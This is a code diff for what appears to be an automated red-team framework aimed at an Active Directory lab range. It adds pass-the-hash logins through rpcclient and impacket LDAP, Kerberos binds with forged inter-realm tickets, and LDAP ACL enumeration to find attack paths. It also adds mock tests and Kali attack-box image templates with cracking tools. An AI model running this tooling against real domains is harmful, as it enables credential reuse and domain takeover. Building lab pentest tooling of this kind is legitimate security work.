+    if let Some(ccache) = ticket_path {
+        // Kerberos GSSAPI bind via a cached ticket. The caller must ensure
+        // `target` is an FQDN so ldapsearch can derive the
+        // `ldap/<target>@<REALM>` SPN.
+        cmd = cmd.env("KRB5CCNAME", ccache).arg("-Y").arg("GSSAPI");
+    } else if let (Some(u), Some(p)) = (username, password) {
+        let auth_domain = bind_domain.unwrap_or(domain);
+        let bind_dn = format!("{u}@{auth_domain}");
+        cmd = cmd.arg("-x").flag("-D", bind_dn).flag("-w", p);
+    } else {
+        cmd = cmd.arg("-x");
     }

     cmd = cmd.flag("-b", computed_base_dn);
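(Aside, not part of the diff: the call shape for the new Kerberos path, with a ccache name following the deterministic scheme from trust.rs — values are illustrative lab conventions. `target` must be an FQDN or the `ldap/<fqdn>` SPN derivation fails:)

    let args = serde_json::json!({
        "target": "dc01.fabrikam.local",
        "domain": "fabrikam.local",
        "ticket_path": "/tmp/ares-tickets/contoso_local__fabrikam_local__Administrator.ccache"
    });
    // ldap_search(&args) now binds with `-Y GSSAPI` under KRB5CCNAME
    // instead of attempting a simple bind.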
@@ -317,16 +331,34 @@ pub async fn ldap_search(args: &Value) -> Result<ToolOutput> {
 /// Execute an rpcclient command against a target.
 ///
 /// Required args: `target`, `command`
-/// Optional args: `username`, `password`, `domain`, `null_session`
+/// Optional args: `username`, `password`, `domain`, `null_session`, `hash`
 pub async fn rpcclient_command(args: &Value) -> Result<ToolOutput> {
     let target = required_str(args, "target")?;
     let command = required_str(args, "command")?;
     let null_session = optional_bool(args, "null_session").unwrap_or(false);
+    let hash = optional_str(args, "hash");

     let mut cmd = CommandBuilder::new("rpcclient").timeout_secs(120);

     if null_session {
         cmd = cmd.args(["-U", "", "-N"]);
+    } else if let Some(ntlm_hash) = hash {
+        // Pass-the-hash: use --pw-nt-hash and supply the NTLM hash as the
+        // password. rpcclient --pw-nt-hash expects only the NT hash (32 hex
+        // chars), not LM:NT. If the hash is in LM:NT form (e.g.
+        // "aad3b435...:2e993405..."), extract just the NT part after the colon.
+        let nt_hash = if ntlm_hash.contains(':') {
+            ntlm_hash.rsplit(':').next().unwrap_or(ntlm_hash)
+        } else {
+            ntlm_hash
+        };
+        let domain = optional_str(args, "domain");
+        let username = optional_str(args, "username").unwrap_or("Administrator");
+        let user_spec = match domain {
+            Some(d) => format!("{d}/{username}%{nt_hash}"),
+            None => format!("{username}%{nt_hash}"),
+        };
+        cmd = cmd.flag("-U", user_spec).arg("--pw-nt-hash");
     } else {
         let domain = optional_str(args, "domain");
         let username = optional_str(args, "username").unwrap_or("");
@@ -381,6 +413,12 @@ pub async fn enumerate_domain_trusts(args: &Value) -> Result<ToolOutput> {
     let password = optional_str(args, "password");
     let hash = optional_str(args, "hash");
     let base_dn = optional_str(args, "base_dn");
+    // Cross-realm auth: the orchestrator sets `bind_domain` to the cred's
+    // actual realm when the credential lives in a different forest from the
+    // search target (e.g. the cred is `user@contoso.local` querying a
+    // `fabrikam.local` DC). Without this, the bind DN gets the target realm
+    // and the foreign DC rejects with `invalidCredentials`. Falls back to
+    // `domain` when absent.
+    let bind_domain = optional_str(args, "bind_domain").unwrap_or(domain);

     // Hash-based auth: use impacket LDAP client with pass-the-hash (NTLM)
     if let (Some(u), Some(h)) = (username, hash) {
@@ -400,7 +438,7 @@ pub async fn enumerate_domain_trusts(args: &Value) -> Result<ToolOutput> {
             r#"python3 -c "
 from impacket.ldap import ldap as ldap_mod
 conn = ldap_mod.LDAPConnection('ldap://{target}', '{base_dn}', '{target}')
-conn.login('{u}', '', '{domain}', lmhash='', nthash='{nt_hash}')
+conn.login('{u}', '', '{bind_domain}', lmhash='', nthash='{nt_hash}')
 sc = ldap_mod.SimplePagedResultsControl(size=1000)
 resp = conn.search(searchFilter='(objectClass=trustedDomain)', attributes=['cn','trustDirection','trustType','trustAttributes','flatName'], searchControls=[sc])
 for item in resp:
@@ -419,7 +457,7 @@ for item in resp:
 "
 "#,
             target = target,
-            domain = domain,
+            bind_domain = bind_domain,
             u = u,
             nt_hash = nt_hash,
             base_dn = computed_base_dn,
@@ -444,7 +482,7 @@ for item in resp:
         .timeout_secs(120);

     if let (Some(u), Some(p)) = (username, password) {
-        let bind_dn = format!("{u}@{domain}");
+        let bind_dn = format!("{u}@{bind_domain}");
         cmd = cmd.flag("-D", bind_dn).flag("-w", p);
     }

@@ -573,6 +611,137 @@ pub async fn smbclient_kerberos_shares(args: &Value) -> Result<ToolOutput> {
     cmd.arg(format!("@{target}")).execute().await
 }
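(Aside, not part of the diff: ldap_search, enumerate_domain_trusts, and ldap_acl_enumeration below all share one bind rule — the search partition comes from `domain`, the authenticating UPN realm from `bind_domain`. Extracted for illustration, function name hypothetical:)

    fn bind_dn(user: &str, domain: &str, bind_domain: Option<&str>) -> String {
        format!("{user}@{}", bind_domain.unwrap_or(domain))
    }
    // bind_dn("admin", "fabrikam.local", Some("contoso.local"))
    //     == "admin@contoso.local"   // cross-forest: bind with the cred's realm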
+/// Enumerate ACL attack paths via LDAP nTSecurityDescriptor queries.
+///
+/// Queries all user, group, and computer objects, requesting
+/// nTSecurityDescriptor, sAMAccountName, objectClass, and objectSid. The
+/// binary SD data is parsed by the ntsd parser to identify dangerous ACEs.
+///
+/// Required args: `target`, `domain`
+/// Optional args: `username`, `password`, `bind_domain`, `hash`, `ticket_path`
+pub async fn ldap_acl_enumeration(args: &Value) -> Result<ToolOutput> {
+    let target = required_str(args, "target")?;
+    let domain = required_str(args, "domain")?;
+    let username = optional_str(args, "username");
+    let password = optional_str(args, "password");
+    let bind_domain = optional_str(args, "bind_domain");
+    let hash = optional_str(args, "hash");
+    let ticket_path = optional_str(args, "ticket_path");
+
+    let base_dn = domain_to_base_dn(domain);
+    let uri = format!("ldap://{target}");
+
+    // Kerberos GSSAPI bind for cross-forest LDAP enumeration. Takes precedence
+    // over hash/password — when a forged inter-realm ticket is present we MUST
+    // use it; otherwise a simple bind with a source-realm cred fails 0x52e.
+    if let Some(ccache) = ticket_path {
+        return CommandBuilder::new("ldapsearch")
+            .env("KRB5CCNAME", ccache)
+            .flag("-H", &uri)
+            .arg("-Y")
+            .arg("GSSAPI")
+            .timeout_secs(300)
+            .flag("-b", &base_dn)
+            .args(["-E", "1.2.840.113556.1.4.801=::MAMCAQQ="])
+            .arg("(|(objectCategory=person)(objectCategory=group)(objectCategory=computer))")
+            .args([
+                "sAMAccountName",
+                "objectClass",
+                "objectSid",
+                "nTSecurityDescriptor",
+            ])
+            .execute()
+            .await;
+    }
+
+    // If a hash is provided, use the impacket LDAP client for pass-the-hash
+    if let (Some(u), Some(h)) = (username, hash) {
+        let nt_hash = if h.contains(':') {
+            h.rsplit(':').next().unwrap_or(h)
+        } else {
+            h
+        };
+        let ldap_query = format!(
+            r#"python3 -c "
+import base64
+from impacket.ldap import ldap as ldap_mod
+conn = ldap_mod.LDAPConnection('ldap://{target}', '{base_dn}', '{target}')
+conn.login('{u}', '', '{domain}', lmhash='', nthash='{nt_hash}')
+sc = ldap_mod.SimplePagedResultsControl(size=1000)
+resp = conn.search(
+    searchFilter='(|(objectCategory=person)(objectCategory=group)(objectCategory=computer))',
+    attributes=['sAMAccountName','objectClass','objectSid','nTSecurityDescriptor'],
+    searchControls=[sc],
+    sizeLimit=0,
+)
+for item in resp:
+    try:
+        dn = str(item['objectName'])
+        if not dn:
+            continue
+        print(f'dn: {{dn}}')
+        for attr in item['attributes']:
+            name = str(attr['type'])
+            for val in attr['vals']:
+                if name == 'nTSecurityDescriptor':
+                    b = bytes(val)
+                    print(f'nTSecurityDescriptor:: {{base64.b64encode(b).decode()}}')
+                elif name == 'objectSid':
+                    b = bytes(val)
+                    print(f'objectSid:: {{base64.b64encode(b).decode()}}')
+                else:
+                    print(f'{{name}}: {{val}}')
+        print()
+    except Exception:
+        pass
+"
+"#,
+            target = target,
+            domain = domain,
+            u = u,
+            nt_hash = nt_hash,
+            base_dn = base_dn,
+        );
+        return CommandBuilder::new("bash")
+            .args(["-c", &ldap_query])
+            .timeout_secs(300)
+            .execute()
+            .await;
+    }
+
+    // Password-based: use ldapsearch with the LDAP_SERVER_SD_FLAGS_OID control
+    // to request the DACL (value 4) in the nTSecurityDescriptor attribute
+    let mut cmd = CommandBuilder::new("ldapsearch")
+        .arg("-x")
+        .flag("-H", &uri)
+        .timeout_secs(300);
+
+    if let (Some(u), Some(p)) = (username, password) {
+        let auth_domain = bind_domain.unwrap_or(domain);
+        let bind_dn = format!("{u}@{auth_domain}");
+        cmd = cmd.flag("-D", bind_dn).flag("-w", p);
+    }
+
+    cmd = cmd
+        .flag("-b", &base_dn)
+        // Request the DACL only, via the SD_FLAGS control (0x04 = DACL).
+        // BER: SEQUENCE { INTEGER 4 } = 30 03 02 01 04 → base64 MAMCAQQ=
+        .args(["-E", "1.2.840.113556.1.4.801=::MAMCAQQ="])
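+        // One pass over users, groups, and computers — the same principal
+        // set the ntsd parser consumes downstream.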
.arg("(|(objectCategory=person)(objectCategory=group)(objectCategory=computer))") + .args([ + "sAMAccountName", + "objectClass", + "objectSid", + "nTSecurityDescriptor", + ]); + + cmd.execute().await +} + +// --------------------------------------------------------------------------- +// Tests +// --------------------------------------------------------------------------- + #[cfg(test)] mod tests { use super::*; @@ -595,6 +764,8 @@ mod tests { assert_eq!(domain_to_base_dn("local"), "DC=local"); } + // --- mock executor tests: exercise full CommandBuilder code paths --- + use crate::executor::mock; use serde_json::json; @@ -808,6 +979,37 @@ mod tests { assert!(result.is_ok()); } + #[tokio::test] + async fn enumerate_domain_trusts_cross_realm_bind_domain() { + // Cross-forest: cred is for contoso.local but we're querying + // fabrikam.local DC. The tool must bind with the cred's realm, + // not the target realm. + mock::push(mock::success()); + let args = json!({ + "target": "192.168.58.20", + "domain": "fabrikam.local", + "bind_domain": "contoso.local", + "username": "admin", + "password": "P@ss" + }); + let result = enumerate_domain_trusts(&args).await; + assert!(result.is_ok()); + } + + #[tokio::test] + async fn enumerate_domain_trusts_cross_realm_pth_bind_domain() { + mock::push(mock::success()); + let args = json!({ + "target": "192.168.58.20", + "domain": "fabrikam.local", + "bind_domain": "contoso.local", + "username": "admin", + "hash": "aad3b435:aabbccdd" + }); + let result = enumerate_domain_trusts(&args).await; + assert!(result.is_ok()); + } + #[tokio::test] async fn check_rdp_reachability_builds_command() { mock::push(mock::success()); diff --git a/config/ares.yaml b/config/ares.yaml index 9f910b8f..0b0a429b 100644 --- a/config/ares.yaml +++ b/config/ares.yaml @@ -20,8 +20,8 @@ operation: # stop_on_golden_ticket: true — stop after golden ticket + all forests dominated # # Default (both false): wait until ALL forest root DCs are secretsdumped. - # Child domain DA does NOT count — e.g. north.sevenkingdoms.local krbtgt - # does not satisfy sevenkingdoms.local; trust escalation must complete first. + # Child domain DA does NOT count — e.g. child.contoso.local krbtgt + # does not satisfy contoso.local; trust escalation must complete first. # See docs/red.md "Operation Completion" for details. 
# stop_on_domain_admin: true stop_on_golden_ticket: false diff --git a/test.sh b/test.sh index 2181dfb4..63cac591 100755 --- a/test.sh +++ b/test.sh @@ -5,17 +5,22 @@ EC2_NAME="${EC2_NAME:-kali-ares}" TARGET="${TARGET:-dreadgoad}" BLUE_ENABLED="${BLUE_ENABLED:-1}" -echo "=== Deploying binaries to ${EC2_NAME} ===" -task -y ec2:deploy EC2_NAME="${EC2_NAME}" +echo "=== Stopping workers + any running operation ===" +task ec2:stop EC2_NAME="${EC2_NAME}" 2>/dev/null || true +task ec2:stop-op EC2_NAME="${EC2_NAME}" LATEST=true 2>/dev/null || true echo "" -echo "=== Stopping any running operation ===" -task ec2:stop-op EC2_NAME="${EC2_NAME}" LATEST=true 2>/dev/null || true +echo "=== Deploying binaries to ${EC2_NAME} ===" +task -y ec2:deploy EC2_NAME="${EC2_NAME}" echo "" echo "=== Wiping Redis ===" task ec2:exec EC2_NAME="${EC2_NAME}" CMD="redis-cli FLUSHALL" +echo "" +echo "=== Starting workers on fresh Redis with new binary ===" +task ec2:start EC2_NAME="${EC2_NAME}" + echo "" echo "=== Launching operation against ${TARGET} (blue=${BLUE_ENABLED}) ===" task -y red:ec2:multi TARGET="${TARGET}" EC2_NAME="${EC2_NAME}" BLUE_ENABLED="${BLUE_ENABLED}" diff --git a/warpgate-templates/templates/ares-golden-azure/warpgate.yaml b/warpgate-templates/templates/ares-golden-azure/warpgate.yaml new file mode 100644 index 00000000..fd3ca6ec --- /dev/null +++ b/warpgate-templates/templates/ares-golden-azure/warpgate.yaml @@ -0,0 +1,95 @@ +# yaml-language-server: $schema=https://raw.githubusercontent.com/cowdogmoo/warpgate/main/schema/warpgate-template.json +metadata: + name: ares-golden-azure + version: 1.0.0 + description: Azure variant of the Ares golden image with all red team tools - recon, credential access, privesc, cracking, lateral movement, ACL abuse, and coercion + author: Dreadnode + license: MIT + tags: + - ares + - golden-image + - azure + - red-team + - reconnaissance + - credential-access + - privilege-escalation + - password-cracking + - lateral-movement + - acl + - coercion + requires: + warpgate: '>=1.0.0' + +name: ares-golden-azure +version: latest + +base: + image: kali-linux/kali/kali-last:latest + +provisioners: + # Install pipx + Ansible, then fetch the nimbus_range collection on the build VM. + # We re-clone in shell rather than using warpgate's `sources` + `type: file` + # pattern (see ares-golden-image) because Azure Image Builder expands `type: file` + # into one customizer per file and times out on the 2000+ file ansible/ tree. + # Token is passed via a credential helper so it never appears in the clone URL + # or AIB customizer logs; ref tracks the AMI variant. + - type: shell + inline: + - apt-get update + - apt-get install -y --no-install-recommends ca-certificates git procps sudo python3-apt python3-pip python3-venv pipx + - 'sed -i ''s|^PATH="|PATH="/root/.local/bin:/root/.cargo/bin:|'' /etc/environment || echo ''PATH="/root/.local/bin:/root/.cargo/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"'' > /etc/environment' + - pipx install --force uv + - pipx install --force ansible-core + - pipx ensurepath + - GITHUB_TOKEN=${GITHUB_TOKEN} git -c 'credential.helper=!f() { echo username=x-access-token; echo password=$GITHUB_TOKEN; }; f' clone --depth 1 --branch feat/more-attack-cov https://github.com/dreadnode/ares.git /tmp/nimbus_range + - mkdir -p /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range + - cp -r /tmp/nimbus_range/ansible/. 
/root/.ansible/collections/ansible_collections/dreadnode/nimbus_range/ + - rm -rf /tmp/nimbus_range + + # Attack Box - all red team tools + Alloy telemetry + # NOTE: Using shell instead of ansible provisioner because the playbook + # exceeds Azure VM Image Builder's customizer length limit when inlined. + # GPU drivers/CUDA are deferred to first-boot on GPU SKUs (cloud-init or + # systemd unit on the consuming VM) — Azure standard managed disks are + # too slow to do the 3GB+ cuda-toolkit + DKMS rebuild inside the AIB + # buildTimeout. apt hashcat is used instead of compiling from source + # for the same reason (the AWS variant has NVMe local storage, Azure + # D-series does not). + - type: shell + inline: + - PATH=/root/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin ansible-galaxy collection install -r /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range/requirements.yml --force + - HOME=/root ANSIBLE_REMOTE_TMP=/tmp/ansible-tmp-$USER PATH=/root/.local/bin:/root/.cargo/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin ansible-playbook /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range/playbooks/ares/goad_attack_box.yml -i localhost, -c local -e ansible_shell_executable=/bin/bash -e ansible_python_interpreter=/usr/bin/python3 -e cloud_provider=azure -e cracking_tools_gpu_support=false + + # Cleanup + - type: shell + inline: + - apt-get clean + - rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/* + - echo "Ares golden azure build completed successfully" + +targets: + - type: azure + subscription_id: 70a9c8a4-6bc6-4a48-ae24-27996cea8c02 + location: centralus + resource_group: WARPGATE-TEST-RG + gallery: warpgateTestGallery + gallery_image_definition: ares-golden-azure + identity_id: /subscriptions/70a9c8a4-6bc6-4a48-ae24-27996cea8c02/resourcegroups/warpgate-test-rg/providers/Microsoft.ManagedIdentity/userAssignedIdentities/warpgate-aib-uami + # D8s_v3 (8 vCPU) timed out at 360min on the full red-team toolchain; + # bumping to D16s_v3 for 2x parallelism. D8s_v5 capacity-restricted. + vm_size: Standard_D16s_v3 + source_image: + marketplace: + publisher: kali-linux + offer: kali + sku: kali-2026-1 + version: latest + plan: + name: kali-2026-1 + product: kali + publisher: kali-linux + image_tags: + Project: ares + Role: RedTeamAttackBox + ManagedBy: warpgate + Tools: recon,credential-access,privesc,cracker,lateral-movement,acl-abuse,coercion diff --git a/warpgate-templates/templates/ares-golden-image/warpgate.yaml b/warpgate-templates/templates/ares-golden-image/warpgate.yaml index bd18b1bd..6a505f6f 100644 --- a/warpgate-templates/templates/ares-golden-image/warpgate.yaml +++ b/warpgate-templates/templates/ares-golden-image/warpgate.yaml @@ -34,9 +34,14 @@ base: most_recent: true sources: - - name: nimbus_range + # Clone the ares repo and use its ansible/ subtree as the nimbus_range + # collection. This keeps the AMI tracking the same branch as the rest of + # the project — role edits ship together, no second repo to publish to. + # Mirrors the pattern in ares-golden-azure/warpgate.yaml. 
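+  # Only the ansible/ subtree is consumed on the instance; the /tmp/ares
+  # clone is removed again after the copy below.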
+  - name: ares
     git:
-      repository: https://github.com/dreadnode/ansible-collection-nimbus_range.git
+      repository: https://github.com/dreadnode/ares.git
+      ref: feat/more-attack-cov
       depth: 1
       auth:
         token: ${GITHUB_TOKEN}
@@ -52,39 +57,54 @@ provisioners:
     - pipx install --force ansible-core
     - pipx ensurepath

-  # Copy ansible collection from source (cloned securely by warpgate without embedding token in shell commands)
+  # Copy the ansible/ subtree of the ares repo into the nimbus_range
+  # collection path on the build instance.
   - type: file
-    source: ${sources.nimbus_range}
-    destination: /tmp/nimbus_range
+    source: ${sources.ares}
+    destination: /tmp/ares

-  - type: shell
-    inline:
-      - mkdir -p /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range
-      - cp -r /tmp/nimbus_range/* /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range/
-      - rm -rf /tmp/nimbus_range
-
-  # Install NVIDIA drivers for GPU-accelerated hashcat on g4dn (T4 GPU)
-  - type: shell
-    inline:
-      - apt-get update
-      - apt-get install -y --no-install-recommends nvidia-driver firmware-misc-nonfree
-      - nvidia-smi || echo "nvidia-smi not available during AMI build (expected if no GPU attached)"
-
-  # Attack Box - all red team tools + Alloy telemetry
+  # Attack Box - all red team tools + Alloy telemetry. The cracking_tools
+  # role handles the full NVIDIA stack (driver, DKMS, CUDA toolkit, OpenCL
+  # ICD) — driving it through ansible keeps Recommends enabled (so dkms +
+  # libcuda1 come along), uses linux-headers-amd64 (the meta-package, kept
+  # in sync with the running kernel) instead of pinning to the AMI builder's
+  # kernel, and verifies nvidia-smi/clinfo at build time.
   # NOTE: Using shell instead of ansible provisioner because the playbook
   # exceeds EC2 Image Builder's 16000 character component limit.
+  #
+  # nimbus_range MUST come from this repo's ansible/ subtree, NEVER from
+  # Ansible Galaxy. The published `dreadnode.nimbus_range` 1.5.x lags this
+  # branch's role edits (e.g. NVIDIA driver/CUDA tasks). Strategy:
+  #   1. Galaxy deps go to /opt/ansible-galaxy-deps (an isolated path).
+  #   2. The local nimbus_range overlay lives at /root/.ansible/collections.
+  #   3. ANSIBLE_COLLECTIONS_PATH lists local first, galaxy deps second —
+  #      so even if a transitive dep pulls nimbus_range into the galaxy
+  #      path, the local copy wins.
+  #   4. Defense-in-depth: rm any nimbus_range that ends up in the galaxy
+  #      path, and assert a known-local marker before running the playbook.
   - type: shell
     inline:
-      - PATH=/root/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin ansible-galaxy collection install -r /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range/requirements.yml --force
-      - HOME=/root ANSIBLE_REMOTE_TMP=/tmp/ansible-tmp-$USER PATH=/root/.local/bin:/root/.cargo/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin ansible-playbook /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range/playbooks/ares/goad_attack_box.yml -i localhost, -c local -e ansible_shell_executable=/bin/bash -e ansible_python_interpreter=/usr/bin/python3 -e cracking_tools_gpu_support=true -e cracking_tools_hashcat_from_source=true -e cracking_tools_nvidia_opencl_icd=true
-
-  # NVIDIA GPU drivers + CUDA toolkit for hashcat GPU acceleration.
-  # Kernel headers + dkms are required so the nvidia module builds for the
-  # running kernel. The AMI then works on GPU instances (e.g. g4dn.xlarge)
-  # without manual driver setup.
- - type: shell - inline: - - DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends linux-headers-$(uname -r) dkms nvidia-driver nvidia-cuda-toolkit + - set -euxo pipefail + - echo "=== /tmp/ares source tree ===" + - ls -la /tmp/ares/ /tmp/ares/ansible/ /tmp/ares/ansible/roles/cracking_tools/tasks/ 2>&1 || true + - echo "=== /tmp/ares linux.yml stat + head ===" + - stat /tmp/ares/ansible/roles/cracking_tools/tasks/linux.yml 2>&1 || true + - head -60 /tmp/ares/ansible/roles/cracking_tools/tasks/linux.yml 2>&1 || true + - mkdir -p /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range + - cp -r /tmp/ares/ansible/. /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range/ + - echo "=== overlay linux.yml after cp ===" + - stat /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range/roles/cracking_tools/tasks/linux.yml 2>&1 || true + - head -60 /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range/roles/cracking_tools/tasks/linux.yml 2>&1 || true + - mkdir -p /opt/ansible-galaxy-deps + - PATH=/root/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin ansible-galaxy collection install -r /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range/requirements.yml --collections-path /opt/ansible-galaxy-deps --no-deps + - rm -rf /opt/ansible-galaxy-deps/ansible_collections/dreadnode/nimbus_range + - echo "=== overlay linux.yml after galaxy install ===" + - stat /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range/roles/cracking_tools/tasks/linux.yml 2>&1 || true + - rm -rf /tmp/ares + - test -f /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range/roles/cracking_tools/tasks/linux.yml + - grep -q "Install NVIDIA driver and OpenCL runtime" /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range/roles/cracking_tools/tasks/linux.yml + - grep -q "Show GPU/OpenCL detection summary" /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range/roles/cracking_tools/tasks/linux.yml + - HOME=/root ANSIBLE_COLLECTIONS_PATH=/root/.ansible/collections:/opt/ansible-galaxy-deps ANSIBLE_REMOTE_TMP=/tmp/ansible-tmp-$USER PATH=/root/.local/bin:/root/.cargo/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin ansible-playbook /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range/playbooks/ares/goad_attack_box.yml -i localhost, -c local -e ansible_shell_executable=/bin/bash -e ansible_python_interpreter=/usr/bin/python3 -e cracking_tools_gpu_support=true -e cracking_tools_hashcat_from_source=true -e cracking_tools_nvidia_opencl_icd=true -e cracking_tools_install_nvidia_driver=true -e cracking_tools_install_cuda_toolkit=true # Cleanup - type: shell